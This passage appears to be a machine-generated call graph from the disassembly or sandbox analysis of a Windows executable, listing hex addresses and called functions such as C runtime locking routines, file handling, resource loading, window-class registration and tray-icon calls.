95656->95638 95657 b5e560 95657->95652 95658 b5e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95657->95658 95658->95652 95659 b57d7c __mtinitlocknum 47 API calls 95659->95661 95661->95652 95661->95653 95661->95659 95686 b54e5b 48 API calls __lock 95661->95686 95687 b54ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95661->95687 95672 b5e600 __wopenfile 95663->95672 95664 b5e61a 95693 b57c0e 47 API calls __getptd_noexit 95664->95693 95665 b5e7d5 95665->95664 95670 b5e838 95665->95670 95667 b5e61f 95694 b56e10 8 API calls __wsplitpath_helper 95667->95694 95669 b5354e 95682 b53570 LeaveCriticalSection LeaveCriticalSection _fprintf 95669->95682 95690 b663c9 95670->95690 95672->95664 95672->95665 95695 b5185b 59 API calls 2 library calls 95672->95695 95674 b5e7ce 95674->95665 95696 b5185b 59 API calls 2 library calls 95674->95696 95676 b5e7ed 95676->95665 95697 b5185b 59 API calls 2 library calls 95676->95697 95678->95635 95679->95648 95680->95648 95681->95648 95682->95648 95689 b57e58 LeaveCriticalSection 95683->95689 95685 b5e5de 95685->95656 95686->95661 95687->95661 95688->95657 95689->95685 95698 b65bb1 95690->95698 95692 b663e2 95692->95669 95693->95667 95694->95669 95695->95674 95696->95676 95697->95665 95699 b65bbd _doexit 95698->95699 95700 b65bcf 95699->95700 95703 b65c06 95699->95703 95701 b57c0e __wsplitpath_helper 47 API calls 95700->95701 95702 b65bd4 95701->95702 95704 b56e10 __wsplitpath_helper 8 API calls 95702->95704 95705 b65c78 __wsopen_helper 110 API calls 95703->95705 95708 b65bde _doexit 95704->95708 95706 b65c23 95705->95706 95707 b65c4c __wsopen_helper LeaveCriticalSection 95706->95707 95707->95708 95708->95692 95713 b342f6 95709->95713 95712 b342cc LoadLibraryA GetProcAddress 95712->95586 95714 b342aa 95713->95714 95715 b342ff LoadLibraryA 95713->95715 95714->95586 95714->95712 95715->95714 95716 b34310 GetProcAddress 95715->95716 95716->95714 95718 b34085 FindResourceExW 95717->95718 95719 b340a2 95717->95719 95718->95719 95720 ba4f16 LoadResource 95718->95720 95719->95600 95720->95719 95721 ba4f2b SizeofResource 95720->95721 95721->95719 95722 ba4f3f LockResource 95721->95722 95722->95719 95724 b34526 95723->95724 95725 ba4fe0 95723->95725 95729 b53a8d 95724->95729 95727 b34534 95727->95604 95728->95600 95730 b53a99 _doexit 95729->95730 95731 b53aa7 95730->95731 95733 b53acd 95730->95733 95742 b57c0e 47 API calls __getptd_noexit 95731->95742 95744 b54e1c 95733->95744 95735 b53aac 95743 b56e10 8 API calls __wsplitpath_helper 95735->95743 95736 b53ad3 95750 b539fe 81 API calls 4 library calls 95736->95750 95739 b53ae2 95751 b53b04 LeaveCriticalSection LeaveCriticalSection _fprintf 95739->95751 95741 b53ab7 _doexit 95741->95727 95742->95735 95743->95741 95745 b54e2c 95744->95745 95746 b54e4e EnterCriticalSection 95744->95746 95745->95746 95747 b54e34 95745->95747 95749 b54e44 95746->95749 95748 b57cf4 __lock 47 API calls 95747->95748 95748->95749 95749->95736 95750->95739 95751->95741 95755 b53839 95752->95755 95754 b34510 95754->95614 95756 b53845 _doexit 95755->95756 95757 b53888 95756->95757 95758 b53880 _doexit 95756->95758 95760 b5385b _memset 95756->95760 95759 b54e1c __lock_file 48 API calls 95757->95759 95758->95754 95762 b5388e 95759->95762 95768 b57c0e 47 API calls __getptd_noexit 95760->95768 95770 b5365b 62 API calls 6 library calls 95762->95770 95763 b53875 95769 b56e10 8 API calls __wsplitpath_helper 95763->95769 95766 b538a4 95771 b538c2 LeaveCriticalSection LeaveCriticalSection _fprintf 95766->95771 95768->95763 95769->95758 95770->95766 95771->95758 95775 b5344a GetSystemTimeAsFileTime 95772->95775 95774 b7bdc3 95774->95616 95776 b53478 __aulldiv 95775->95776 95776->95774 95778 b53e71 _doexit 95777->95778 95779 b53e94 95778->95779 95780 b53e7f 95778->95780 95782 b54e1c __lock_file 48 API calls 95779->95782 95791 b57c0e 47 API calls __getptd_noexit 95780->95791 95784 b53e9a 95782->95784 95783 b53e84 95792 b56e10 8 API calls __wsplitpath_helper 95783->95792 95793 b53b0c 55 API calls 5 library calls 95784->95793 95787 b53ea5 95794 b53ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 95787->95794 95789 b53eb7 95790 b53e8f _doexit 95789->95790 95790->95621 95791->95783 95792->95790 95793->95787 95794->95789 95799 b7c581 __tzset_nolock _wcscmp 95795->95799 95796 b7c417 95796->95537 95796->95565 95797 b344ed 64 API calls 95797->95799 95798 b7bf5a GetSystemTimeAsFileTime 95798->95799 95799->95796 95799->95797 95799->95798 95800 b34517 83 API calls 95799->95800 95800->95799 95802 b7b970 95801->95802 95804 b7b97e 95801->95804 95803 b53499 117 API calls 95802->95803 95803->95804 95805 b7b9c3 95804->95805 95806 b53499 117 API calls 95804->95806 95828 b7b987 95804->95828 95832 b7bbe8 64 API calls 3 library calls 95805->95832 95808 b7b9a8 95806->95808 95808->95805 95810 b7b9b1 95808->95810 95809 b7ba07 95811 b7ba2c 95809->95811 95812 b7ba0b 95809->95812 95810->95828 95843 b535e4 95810->95843 95833 b7b7e5 47 API calls __crtLCMapStringA_stat 95811->95833 95815 b7ba18 95812->95815 95817 b535e4 __fcloseall 83 API calls 95812->95817 95820 b535e4 __fcloseall 83 API calls 95815->95820 95815->95828 95816 b7ba34 95818 b7ba5a 95816->95818 95819 b7ba3a 95816->95819 95817->95815 95834 b7ba8a 90 API calls 95818->95834 95821 b7ba47 95819->95821 95823 b535e4 __fcloseall 83 API calls 95819->95823 95820->95828 95825 b535e4 __fcloseall 83 API calls 95821->95825 95821->95828 95823->95821 95824 b7ba61 95835 b7bb64 95824->95835 95825->95828 95828->95566 95829 b7ba75 95829->95828 95831 b535e4 __fcloseall 83 API calls 95829->95831 95830 b535e4 __fcloseall 83 API calls 95830->95829 95831->95828 95832->95809 95833->95816 95834->95824 95836 b7bb71 95835->95836 95837 b7bb77 95835->95837 95838 b51c9d _free 47 API calls 95836->95838 95839 b7bb88 95837->95839 95840 b51c9d _free 47 API calls 95837->95840 95838->95837 95841 b51c9d _free 47 API calls 95839->95841 95842 b7ba68 95839->95842 95840->95839 95841->95842 95842->95829 95842->95830 95844 b535f0 _doexit 95843->95844 95845 b53604 95844->95845 95846 b5361c 95844->95846 95872 b57c0e 47 API calls __getptd_noexit 95845->95872 95848 b54e1c __lock_file 48 API calls 95846->95848 95853 b53614 _doexit 95846->95853 95850 b5362e 95848->95850 95849 b53609 95873 b56e10 8 API calls __wsplitpath_helper 95849->95873 95856 b53578 95850->95856 95853->95828 95857 b53587 95856->95857 95858 b5359b 95856->95858 95915 b57c0e 47 API calls __getptd_noexit 95857->95915 95859 b53597 95858->95859 95875 b52c84 95858->95875 95874 b53653 LeaveCriticalSection LeaveCriticalSection _fprintf 95859->95874 95862 b5358c 95916 b56e10 8 API calls __wsplitpath_helper 95862->95916 95868 b535b5 95892 b5e9d2 95868->95892 95870 b535bb 95870->95859 95871 b51c9d _free 47 API calls 95870->95871 95871->95859 95872->95849 95873->95853 95874->95853 95876 b52c97 95875->95876 95880 b52cbb 95875->95880 95877 b52933 __stbuf 47 API calls 95876->95877 95876->95880 95878 b52cb4 95877->95878 95917 b5af61 95878->95917 95881 b5eb36 95880->95881 95882 b5eb43 95881->95882 95884 b535af 95881->95884 95883 b51c9d _free 47 API calls 95882->95883 95882->95884 95883->95884 95885 b52933 95884->95885 95886 b52952 95885->95886 95887 b5293d 95885->95887 95886->95868 95942 b57c0e 47 API calls __getptd_noexit 95887->95942 95889 b52942 95943 b56e10 8 API calls __wsplitpath_helper 95889->95943 95891 b5294d 95891->95868 95893 b5e9de _doexit 95892->95893 95894 b5e9e6 95893->95894 95895 b5e9fe 95893->95895 95968 b57bda 47 API calls __getptd_noexit 95894->95968 95896 b5ea7b 95895->95896 95901 b5ea28 95895->95901 95972 b57bda 47 API calls __getptd_noexit 95896->95972 95898 b5e9eb 95969 b57c0e 47 API calls __getptd_noexit 95898->95969 95900 b5ea80 95973 b57c0e 47 API calls __getptd_noexit 95900->95973 95944 b5a8ed 95901->95944 95905 b5ea88 95974 b56e10 8 API calls __wsplitpath_helper 95905->95974 95906 b5ea2e 95908 b5ea41 95906->95908 95909 b5ea4c 95906->95909 95953 b5ea9c 95908->95953 95970 b57c0e 47 API calls __getptd_noexit 95909->95970 95911 b5e9f3 _doexit 95911->95870 95913 b5ea47 95971 b5ea73 LeaveCriticalSection __unlock_fhandle 95913->95971 95915->95862 95916->95859 95918 b5af6d _doexit 95917->95918 95919 b5af75 95918->95919 95920 b5af8d 95918->95920 95922 b57bda __lseeki64 47 API calls 95919->95922 95921 b5b022 95920->95921 95926 b5afbf 95920->95926 95924 b57bda __lseeki64 47 API calls 95921->95924 95923 b5af7a 95922->95923 95925 b57c0e __wsplitpath_helper 47 API calls 95923->95925 95927 b5b027 95924->95927 95928 b5af82 _doexit 95925->95928 95929 b5a8ed ___lock_fhandle 49 API calls 95926->95929 95930 b57c0e __wsplitpath_helper 47 API calls 95927->95930 95928->95880 95931 b5afc5 95929->95931 95932 b5b02f 95930->95932 95933 b5afd8 95931->95933 95934 b5afeb 95931->95934 95935 b56e10 __wsplitpath_helper 8 API calls 95932->95935 95936 b5b043 __chsize_nolock 75 API calls 95933->95936 95937 b57c0e __wsplitpath_helper 47 API calls 95934->95937 95935->95928 95940 b5afe4 95936->95940 95938 b5aff0 95937->95938 95939 b57bda __lseeki64 47 API calls 95938->95939 95939->95940 95941 b5b01a __flush LeaveCriticalSection 95940->95941 95941->95928 95942->95889 95943->95891 95945 b5a8f9 _doexit 95944->95945 95946 b5a946 EnterCriticalSection 95945->95946 95947 b57cf4 __lock 47 API calls 95945->95947 95948 b5a96c _doexit 95946->95948 95949 b5a91d 95947->95949 95948->95906 95950 b5a928 InitializeCriticalSectionAndSpinCount 95949->95950 95951 b5a93a 95949->95951 95950->95951 95952 b5a970 ___lock_fhandle LeaveCriticalSection 95951->95952 95952->95946 95954 b5aba4 __close_nolock 47 API calls 95953->95954 95956 b5eaaa 95954->95956 95955 b5eb00 95957 b5ab1e __free_osfhnd 48 API calls 95955->95957 95956->95955 95958 b5eade 95956->95958 95960 b5aba4 __close_nolock 47 API calls 95956->95960 95959 b5eb08 95957->95959 95958->95955 95961 b5aba4 __close_nolock 47 API calls 95958->95961 95963 b5eb2a 95959->95963 95966 b57bed __dosmaperr 47 API calls 95959->95966 95964 b5ead5 95960->95964 95962 b5eaea CloseHandle 95961->95962 95962->95955 95965 b5eaf6 GetLastError 95962->95965 95963->95913 95967 b5aba4 __close_nolock 47 API calls 95964->95967 95965->95955 95966->95963 95967->95958 95968->95898 95969->95911 95970->95913 95971->95911 95972->95900 95973->95905 95974->95911 95975->95471 95976->95471 95977->95465 95978->95484 95979->95486 95980->95482 95981->95500 95982->95495 95984 b5f8a0 __ftell_nolock 95983->95984 95985 b340b4 GetLongPathNameW 95984->95985 95986 b36a63 48 API calls 95985->95986 95987 b340dc 95986->95987 95988 b349a0 95987->95988 95989 b3d7f7 48 API calls 95988->95989 95990 b349b2 95989->95990 95991 b3660f 49 API calls 95990->95991 95992 b349bd 95991->95992 95993 b349c8 95992->95993 95996 ba2e35 95992->95996 95994 b364cf 48 API calls 95993->95994 95997 b349d4 95994->95997 95998 ba2e4f 95996->95998 96041 b4d35e 60 API calls 95996->96041 96035 b328a6 95997->96035 96000 b349e7 Mailbox 96000->95329 96002 b341a9 136 API calls 96001->96002 96003 b3415e 96002->96003 96004 ba3489 96003->96004 96005 b341a9 136 API calls 96003->96005 96006 b7c396 122 API calls 96004->96006 96007 b34172 96005->96007 96008 ba349e 96006->96008 96007->96004 96009 b3417a 96007->96009 96010 ba34bf 96008->96010 96011 ba34a2 96008->96011 96013 ba34aa 96009->96013 96014 b34186 96009->96014 96012 b4f4ea 48 API calls 96010->96012 96015 b34252 84 API calls 96011->96015 96034 ba3504 Mailbox 96012->96034 96136 b76b49 87 API calls _wprintf 96013->96136 96042 b3c833 96014->96042 96015->96013 96018 ba34b8 96018->96010 96020 ba36b4 96021 b51c9d _free 47 API calls 96020->96021 96022 ba36bc 96021->96022 96023 b34252 84 API calls 96022->96023 96028 ba36c5 96023->96028 96024 b3ba85 48 API calls 96024->96034 96027 b51c9d _free 47 API calls 96027->96028 96028->96027 96029 b34252 84 API calls 96028->96029 96140 b725b5 86 API calls 4 library calls 96028->96140 96029->96028 96031 b3ce19 48 API calls 96031->96034 96034->96020 96034->96024 96034->96028 96034->96031 96130 b34dd9 96034->96130 96137 b72551 48 API calls ___crtGetEnvironmentStringsW 96034->96137 96138 b72472 60 API calls 2 library calls 96034->96138 96139 b79c12 48 API calls 96034->96139 96036 b328b8 96035->96036 96040 b328d7 ___crtGetEnvironmentStringsW 96035->96040 96039 b4f4ea 48 API calls 96036->96039 96037 b4f4ea 48 API calls 96038 b328ee 96037->96038 96038->96000 96039->96040 96040->96037 96041->95996 96043 b3c843 __ftell_nolock 96042->96043 96044 b3c860 96043->96044 96045 ba3095 96043->96045 96146 b348ba 49 API calls 96044->96146 96165 b725b5 86 API calls 4 library calls 96045->96165 96048 ba30a8 96166 b725b5 86 API calls 4 library calls 96048->96166 96049 b3c882 96147 b34550 56 API calls 96049->96147 96051 b3c897 96051->96048 96053 b3c89f 96051->96053 96055 b3d7f7 48 API calls 96053->96055 96054 ba30c4 96083 b3c90c 96054->96083 96056 b3c8ab 96055->96056 96148 b4e968 49 API calls __ftell_nolock 96056->96148 96058 b3c91a 96151 b51dfc 96058->96151 96059 ba30d7 96062 b34907 CloseHandle 96059->96062 96060 b3c8b7 96063 b3d7f7 48 API calls 96060->96063 96064 ba30e3 96062->96064 96065 b3c8c3 96063->96065 96066 b341a9 136 API calls 96064->96066 96067 b3660f 49 API calls 96065->96067 96069 ba310d 96066->96069 96068 b3c8d1 96067->96068 96149 b4eb66 SetFilePointerEx ReadFile 96068->96149 96072 ba3136 96069->96072 96076 b7c396 122 API calls 96069->96076 96071 b3c943 _wcscat _wcscpy 96075 b3c96d SetCurrentDirectoryW 96071->96075 96167 b725b5 86 API calls 4 library calls 96072->96167 96073 b3c8fd 96150 b346ce SetFilePointerEx SetFilePointerEx 96073->96150 96079 b4f4ea 48 API calls 96075->96079 96080 ba3129 96076->96080 96078 ba314d 96114 b3cad1 Mailbox 96078->96114 96084 b3c988 96079->96084 96081 ba3152 96080->96081 96082 ba3131 96080->96082 96086 b34252 84 API calls 96081->96086 96085 b34252 84 API calls 96082->96085 96083->96058 96083->96059 96087 b347b7 48 API calls 96084->96087 96085->96072 96088 ba3157 96086->96088 96117 b3c993 Mailbox __wsetenvp 96087->96117 96089 b4f4ea 48 API calls 96088->96089 96096 ba3194 96089->96096 96090 b3ca9d 96161 b34907 96090->96161 96094 b3caa9 SetCurrentDirectoryW 96094->96114 96095 b33d98 96095->95203 96095->95226 96098 b3ba85 48 API calls 96096->96098 96127 ba31dd Mailbox 96098->96127 96100 ba33ce 96172 b79b72 48 API calls 96100->96172 96101 ba3467 96176 b725b5 86 API calls 4 library calls 96101->96176 96105 ba3480 96105->96090 96106 ba33f0 96173 b929e8 48 API calls ___crtGetEnvironmentStringsW 96106->96173 96108 ba33fd 96110 b51c9d _free 47 API calls 96108->96110 96109 ba345f 96175 b7240b 48 API calls 3 library calls 96109->96175 96110->96114 96112 b3ce19 48 API calls 96112->96117 96141 b348dd 96114->96141 96115 b3ba85 48 API calls 96115->96127 96117->96090 96117->96101 96117->96109 96117->96112 96154 b3b337 56 API calls _wcscpy 96117->96154 96155 b4c258 GetStringTypeW 96117->96155 96156 b3cb93 59 API calls __wcsnicmp 96117->96156 96157 b3cb5a GetStringTypeW __wsetenvp 96117->96157 96158 b516d0 GetStringTypeW __towlower_l 96117->96158 96159 b3cc24 162 API calls 3 library calls 96117->96159 96160 b4c682 48 API calls 96117->96160 96121 b3ce19 48 API calls 96121->96127 96124 ba3420 96174 b725b5 86 API calls 4 library calls 96124->96174 96126 ba3439 96128 b51c9d _free 47 API calls 96126->96128 96127->96100 96127->96115 96127->96121 96127->96124 96168 b72551 48 API calls ___crtGetEnvironmentStringsW 96127->96168 96169 b72472 60 API calls 2 library calls 96127->96169 96170 b79c12 48 API calls 96127->96170 96171 b4c682 48 API calls 96127->96171 96129 ba344c 96128->96129 96129->96114 96131 b34dec 96130->96131 96134 b34e9a 96130->96134 96133 b4f4ea 48 API calls 96131->96133 96135 b34e1e 96131->96135 96132 b4f4ea 48 API calls 96132->96135 96133->96135 96134->96034 96135->96132 96135->96134 96136->96018 96137->96034 96138->96034 96139->96034 96140->96028 96142 b34907 CloseHandle 96141->96142 96143 b348e5 Mailbox 96142->96143 96144 b34907 CloseHandle 96143->96144 96145 b348fc 96144->96145 96145->96095 96146->96049 96147->96051 96148->96060 96149->96073 96150->96083 96177 b51e46 96151->96177 96154->96117 96155->96117 96156->96117 96157->96117 96158->96117 96159->96117 96160->96117 96162 b34911 96161->96162 96163 b34920 96161->96163 96162->96094 96163->96162 96164 b34925 CloseHandle 96163->96164 96164->96162 96165->96048 96166->96054 96167->96078 96168->96127 96169->96127 96170->96127 96171->96127 96172->96106 96173->96108 96174->96126 96175->96101 96176->96105 96178 b51e61 96177->96178 96181 b51e55 96177->96181 96201 b57c0e 47 API calls __getptd_noexit 96178->96201 96180 b52019 96185 b51e41 96180->96185 96202 b56e10 8 API calls __wsplitpath_helper 96180->96202 96181->96178 96187 b51ed4 96181->96187 96196 b59d6b 47 API calls __wsplitpath_helper 96181->96196 96184 b51fa0 96184->96178 96184->96185 96188 b51fb0 96184->96188 96185->96071 96186 b51f5f 96186->96178 96189 b51f7b 96186->96189 96198 b59d6b 47 API calls __wsplitpath_helper 96186->96198 96187->96178 96195 b51f41 96187->96195 96197 b59d6b 47 API calls __wsplitpath_helper 96187->96197 96200 b59d6b 47 API calls __wsplitpath_helper 96188->96200 96189->96178 96189->96185 96191 b51f91 96189->96191 96199 b59d6b 47 API calls __wsplitpath_helper 96191->96199 96195->96184 96195->96186 96196->96187 96197->96195 96198->96189 96199->96185 96200->96185 96201->96180 96202->96185 96204 b34d94 96203->96204 96205 b34c8b 96203->96205 96204->95335 96205->96204 96206 b4f4ea 48 API calls 96205->96206 96207 b34cb2 96206->96207 96208 b4f4ea 48 API calls 96207->96208 96213 b34d22 96208->96213 96211 b34dd9 48 API calls 96211->96213 96212 b3ba85 48 API calls 96212->96213 96213->96204 96213->96211 96213->96212 96216 b3b470 96213->96216 96244 b79af1 48 API calls 96213->96244 96214->95337 96215->95339 96245 b36b0f 96216->96245 96218 b3b69b 96219 b3ba85 48 API calls 96218->96219 96220 b3b6b5 Mailbox 96219->96220 96220->96213 96223 ba3939 ___crtGetEnvironmentStringsW 96261 b726bc 88 API calls 4 library calls 96223->96261 96224 ba397b 96262 b726bc 88 API calls 4 library calls 96224->96262 96227 b3b9e4 96263 b726bc 88 API calls 4 library calls 96227->96263 96228 ba3973 96228->96220 96230 b3ba85 48 API calls 96235 b3b495 96230->96235 96232 ba3989 96234 b3ba85 48 API calls 96232->96234 96233 b3bcce 48 API calls 96233->96235 96234->96228 96235->96218 96235->96223 96235->96224 96235->96227 96235->96230 96235->96233 96236 ba3909 96235->96236 96237 b3bb85 48 API calls 96235->96237 96241 b3bdfa 48 API calls 96235->96241 96250 b3c413 59 API calls 96235->96250 96251 b3bc74 48 API calls 96235->96251 96252 b3c6a5 49 API calls 96235->96252 96253 b3c799 96235->96253 96238 b36b4a 48 API calls 96236->96238 96237->96235 96240 ba3914 96238->96240 96243 b4f4ea 48 API calls 96240->96243 96242 b3b66c CharUpperBuffW 96241->96242 96242->96235 96243->96223 96244->96213 96246 b4f4ea 48 API calls 96245->96246 96247 b36b34 96246->96247 96248 b36b4a 48 API calls 96247->96248 96249 b36b43 96248->96249 96249->96235 96250->96235 96251->96235 96252->96235 96254 ba1f17 96253->96254 96257 b3c7b0 96253->96257 96255 b36b4a 48 API calls 96254->96255 96256 ba1f21 96255->96256 96258 b4f4ea 48 API calls 96256->96258 96259 b4ee75 48 API calls 96257->96259 96260 b3c7bd ___crtGetEnvironmentStringsW 96257->96260 96258->96260 96259->96260 96260->96235 96261->96228 96262->96232 96263->96228 96265 ba418d EnumResourceNamesW 96264->96265 96266 b3403c LoadImageW 96264->96266 96267 b33ee1 RegisterClassExW 96265->96267 96266->96267 96268 b33f53 7 API calls 96267->96268 96268->95354 96270 b34c44 96269->96270 96271 ba3c33 96269->96271 96270->95360 96295 b75819 61 API calls _W_store_winword 96270->96295 96271->96270 96272 ba3c3c DestroyIcon 96271->96272 96272->96270 96274 b352a2 Mailbox 96273->96274 96275 b351cb 96273->96275 96274->95365 96276 b36b0f 48 API calls 96275->96276 96277 b351d9 96276->96277 96278 b351e6 96277->96278 96279 ba3ca1 LoadStringW 96277->96279 96280 b36a63 48 API calls 96278->96280 96282 ba3cbb 96279->96282 96281 b351fb 96280->96281 96281->96282 96283 b3520c 96281->96283 96284 b3510d 48 API calls 96282->96284 96285 b352a7 96283->96285 96286 b35216 96283->96286 96289 ba3cc5 96284->96289 96287 b36eed 48 API calls 96285->96287 96288 b3510d 48 API calls 96286->96288 96292 b35220 _memset _wcscpy 96287->96292 96288->96292 96290 b3518c 48 API calls 96289->96290 96289->96292 96291 ba3ce7 96290->96291 96294 b3518c 48 API calls 96291->96294 96293 b35288 Shell_NotifyIconW 96292->96293 96293->96274 96294->96292 96295->95360 96297 b3ef2f 96296->96297 96298 b3ef1d 96296->96298 96463 b7cc5c 86 API calls 4 library calls 96297->96463 96462 b3e3b0 335 API calls 2 library calls 96298->96462 96300 b3ef26 96300->95426 96302 ba86f9 96302->96302 96304 b3f130 96303->96304 96306 b3fe30 335 API calls 96304->96306 96311 b3f199 96304->96311 96305 b3f595 96314 b3d7f7 48 API calls 96305->96314 96342 b3f431 Mailbox 96305->96342 96308 ba8728 96306->96308 96307 ba87c8 96468 b7cc5c 86 API calls 4 library calls 96307->96468 96308->96311 96465 b7cc5c 86 API calls 4 library calls 96308->96465 96309 b3f418 96318 ba8b1b 96309->96318 96338 b3f6aa 96309->96338 96309->96342 96311->96305 96315 b3d7f7 48 API calls 96311->96315 96334 b3f229 96311->96334 96357 b3f3dd 96311->96357 96312 b3fe30 335 API calls 96312->96342 96316 ba87a3 96314->96316 96319 ba8772 96315->96319 96467 b50f0a 52 API calls __cinit 96316->96467 96317 b3f3f2 96317->96309 96469 b79af1 48 API calls 96317->96469 96339 ba8bcf 96318->96339 96340 ba8b2c 96318->96340 96466 b50f0a 52 API calls __cinit 96319->96466 96322 b3f770 96326 ba8a45 96322->96326 96349 b3f77a 96322->96349 96324 b3d6e9 55 API calls 96324->96342 96325 ba8b7e 96478 b8e40a 335 API calls Mailbox 96325->96478 96475 b4c1af 48 API calls 96326->96475 96327 ba8c53 96483 b7cc5c 86 API calls 4 library calls 96327->96483 96328 ba8810 96470 b8eef8 335 API calls 96328->96470 96329 b3fe30 335 API calls 96329->96338 96330 b7cc5c 86 API calls 96330->96342 96331 ba8beb 96481 b8bdbd 335 API calls Mailbox 96331->96481 96334->96305 96334->96309 96334->96342 96334->96357 96338->96322 96338->96329 96341 b3fce0 96338->96341 96338->96342 96346 b3f537 Mailbox 96338->96346 96480 b7cc5c 86 API calls 4 library calls 96339->96480 96477 b8f5ee 335 API calls 96340->96477 96341->96346 96479 b7cc5c 86 API calls 4 library calls 96341->96479 96342->96312 96342->96324 96342->96325 96342->96327 96342->96330 96342->96331 96342->96341 96342->96346 96348 b41b90 48 API calls 96342->96348 96464 b3dd47 48 API calls ___crtGetEnvironmentStringsW 96342->96464 96476 b697ed InterlockedDecrement 96342->96476 96484 b4c1af 48 API calls 96342->96484 96344 b41b90 48 API calls 96344->96342 96346->95426 96348->96342 96349->96344 96350 ba8c00 96350->96346 96482 b7cc5c 86 API calls 4 library calls 96350->96482 96354 ba884b 96471 b8ccdc 48 API calls 96354->96471 96355 ba8823 96355->96309 96355->96354 96357->96307 96357->96317 96357->96342 96358 ba8857 96360 ba88aa 96358->96360 96361 ba8865 96358->96361 96365 ba88a0 Mailbox 96360->96365 96473 b7a69d 48 API calls 96360->96473 96472 b79b72 48 API calls 96361->96472 96362 b3fe30 335 API calls 96362->96346 96365->96362 96366 ba88e7 96474 b3bc74 48 API calls 96366->96474 96369 b44637 96368->96369 96370 b4479f 96368->96370 96371 b44643 96369->96371 96372 ba6e05 96369->96372 96373 b3ce19 48 API calls 96370->96373 96538 b44300 335 API calls ___crtGetEnvironmentStringsW 96371->96538 96539 b8e822 96372->96539 96380 b446e4 Mailbox 96373->96380 96376 b44659 96377 ba6e11 96376->96377 96378 b44739 Mailbox 96376->96378 96376->96380 96377->96378 96579 b7cc5c 86 API calls 4 library calls 96377->96579 96378->95426 96381 b34252 84 API calls 96380->96381 96485 b7fa0c 96380->96485 96526 b76524 96380->96526 96529 b86ff0 96380->96529 96381->96378 96387 badf42 96385->96387 96388 b4e253 96385->96388 96386 badf77 96387->96386 96389 badf59 TranslateAcceleratorW 96387->96389 96388->95426 96389->96388 96391 b4dca3 96390->96391 96393 b4dc71 96390->96393 96391->95426 96392 b4dc96 IsDialogMessageW 96392->96391 96392->96393 96393->96391 96393->96392 96394 badd1d GetClassLongW 96393->96394 96394->96392 96394->96393 96395->95426 96692 b3bd30 96396->96692 96398 b43267 96404 b43313 Mailbox ___crtGetEnvironmentStringsW 96398->96404 96704 b4c36b 86 API calls 96398->96704 96402 b3fe30 335 API calls 96402->96404 96403 b3d645 53 API calls 96403->96404 96404->96402 96404->96403 96405 b4c2d6 48 API calls 96404->96405 96408 b3d6e9 55 API calls 96404->96408 96412 b4c3c3 48 API calls 96404->96412 96413 b7cc5c 86 API calls 96404->96413 96415 b4f4ea 48 API calls 96404->96415 96417 b3e8d0 335 API calls 96404->96417 96418 b36eed 48 API calls 96404->96418 96420 b3dcae 50 API calls 96404->96420 96421 b43635 Mailbox 96404->96421 96697 b32b7a 96404->96697 96705 b3d9a0 53 API calls __cinit 96404->96705 96706 b3d8c0 53 API calls 96404->96706 96707 b8f320 335 API calls 96404->96707 96708 b8f5ee 335 API calls 96404->96708 96709 b31caa 49 API calls 96404->96709 96710 b8cda2 82 API calls Mailbox 96404->96710 96711 b780e3 53 API calls 96404->96711 96712 b3d764 55 API calls 96404->96712 96713 b7c942 50 API calls 96404->96713 96405->96404 96408->96404 96412->96404 96413->96404 96415->96404 96417->96404 96418->96404 96420->96404 96421->95426 96422->95380 96423->95373 96424->95377 96425->95426 96426->95426 96427->95422 96428->95422 96429->95422 96431 b3fe50 96430->96431 96452 b3fe7e 96430->96452 96432 b4f4ea 48 API calls 96431->96432 96432->96452 96433 b4146e 96434 b36eed 48 API calls 96433->96434 96453 b3ffe1 96434->96453 96435 b4f4ea 48 API calls 96435->96452 96436 b697ed InterlockedDecrement 96436->96452 96438 b40509 96720 b7cc5c 86 API calls 4 library calls 96438->96720 96441 b50f0a 52 API calls __cinit 96441->96452 96442 baa246 96445 b36eed 48 API calls 96442->96445 96443 b41473 96719 b7cc5c 86 API calls 4 library calls 96443->96719 96444 baa922 96444->95426 96445->96453 96448 b36eed 48 API calls 96448->96452 96449 baa873 96449->95426 96450 b3d7f7 48 API calls 96450->96452 96451 baa30e 96451->96453 96717 b697ed InterlockedDecrement 96451->96717 96452->96433 96452->96435 96452->96436 96452->96438 96452->96441 96452->96442 96452->96443 96452->96448 96452->96450 96452->96451 96452->96453 96455 baa973 96452->96455 96458 b415b5 96452->96458 96715 b41820 335 API calls 2 library calls 96452->96715 96716 b41d10 59 API calls Mailbox 96452->96716 96453->95426 96721 b7cc5c 86 API calls 4 library calls 96455->96721 96457 baa982 96718 b7cc5c 86 API calls 4 library calls 96458->96718 96459->95422 96460->95422 96461->95422 96462->96300 96463->96302 96464->96342 96465->96311 96466->96334 96467->96342 96468->96346 96469->96328 96470->96355 96471->96358 96472->96365 96473->96366 96474->96365 96475->96342 96476->96342 96477->96342 96478->96341 96479->96346 96480->96346 96481->96350 96482->96346 96483->96346 96484->96342 96486 b7fa1c __ftell_nolock 96485->96486 96487 b7fa44 96486->96487 96641 b3d286 48 API calls 96486->96641 96489 b3936c 81 API calls 96487->96489 96490 b7fa5e 96489->96490 96491 b7fa80 96490->96491 96492 b7fb68 96490->96492 96501 b7fb92 96490->96501 96493 b3936c 81 API calls 96491->96493 96494 b341a9 136 API calls 96492->96494 96499 b7fa8c _wcscpy _wcschr 96493->96499 96495 b7fb79 96494->96495 96496 b7fb8e 96495->96496 96498 b341a9 136 API calls 96495->96498 96497 b3936c 81 API calls 96496->96497 96496->96501 96500 b7fbc7 96497->96500 96498->96496 96505 b7fab0 _wcscat _wcscpy 96499->96505 96509 b7fade _wcscat 96499->96509 96502 b51dfc __wsplitpath 47 API calls 96500->96502 96501->96378 96512 b7fbeb _wcscat _wcscpy 96502->96512 96503 b3936c 81 API calls 96504 b7fafc _wcscpy 96503->96504 96642 b772cb GetFileAttributesW 96504->96642 96507 b3936c 81 API calls 96505->96507 96507->96509 96508 b7fb1c __wsetenvp 96508->96501 96510 b3936c 81 API calls 96508->96510 96509->96503 96514 b3936c 81 API calls 96512->96514 96679 b76ca9 GetFileAttributesW 96526->96679 96530 b3936c 81 API calls 96529->96530 96531 b8702a 96530->96531 96532 b3b470 91 API calls 96531->96532 96533 b8703a 96532->96533 96534 b3fe30 335 API calls 96533->96534 96535 b8705f 96533->96535 96534->96535 96537 b87063 96535->96537 96683 b3cdb9 48 API calls 96535->96683 96537->96378 96538->96376 96540 b8e868 96539->96540 96541 b8e84e 96539->96541 96685 b8ccdc 48 API calls 96540->96685 96684 b7cc5c 86 API calls 4 library calls 96541->96684 96544 b8e860 Mailbox 96544->96377 96545 